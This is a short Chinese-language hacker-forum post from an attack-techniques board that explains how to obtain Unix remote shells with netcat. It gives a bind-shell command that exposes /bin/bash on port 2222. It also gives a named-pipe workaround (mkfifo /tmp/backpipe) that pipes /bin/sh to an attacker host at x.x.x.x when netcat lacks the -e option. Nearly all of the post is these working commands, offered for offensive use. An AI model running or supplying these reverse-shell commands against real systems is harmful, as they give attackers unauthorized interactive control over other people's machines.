当前位置:»交流社区 › 中国红客联盟【技术分享区】 › 攻击技术探索 › Unix系统NC反弹shell的方法

[漏洞利用] Unix系统NC反弹shell的方法

388 0

Honkers 2021-7-5 12:20:54 | 显示全部楼层 |阅读模式

NC的原生做法：
nc -l -vv -p 2222 -e /bin/bash
无法使用NC反弹的时候可以这样
先在tmp创建一个普通管道
mknod /tmp/backpipe p
或者
mkfifo /tmp/backpipe p
然后管道一边接入shell,一变用NC反弹到攻击者主机x.x.x.x
/bin/sh 0</tmp/backpipe | nc x.x.x.x listenport 1>/tmp/backpipe

PS：攻防的对抗一直在思路的转变之间，将原有思路逆转，可能收获不一样的东西！